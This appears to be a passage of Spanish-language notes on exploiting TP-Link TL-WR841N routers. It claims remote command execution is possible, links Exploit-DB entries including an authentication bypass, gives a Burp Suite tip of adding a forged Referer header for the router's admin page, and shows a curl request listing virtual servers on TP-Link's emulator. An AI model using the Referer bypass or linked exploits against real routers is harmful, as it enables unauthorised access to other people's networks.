Se puede acceder a toda la configuración y ejecutar cualquier comando remotamente. https://www.exploit-db.com/exploits/45064 https://www.exploit-db.com/exploits/45168 https://www.exploit-db.com/exploits/45203 https://www.exploit-db.com/exploits/46882 Usando burp-suite podés repetir la consulta agregandole `'Referer: http://192.168.0.1/mainFrame.htm'` #### Authentication Bypass: https://www.exploit-db.com/exploits/44781 #### Emulador TL-WR841N https://emulator.tp-link.com/TL-WR841ND_V8/Index.htm #### Listar Virtual Servers: ``` curl 'https://emulator.tp-link.com/TL-WR841ND_V8/userRpm/VirtualServerRpm.htm' \ -H 'Referer: https://emulator.tp-link.com/TL-WR841ND_V8/userRpm/MenuRpm.htm' \ -H 'Upgrade-Insecure-Requests: 1' \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \ -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "Linux"' ```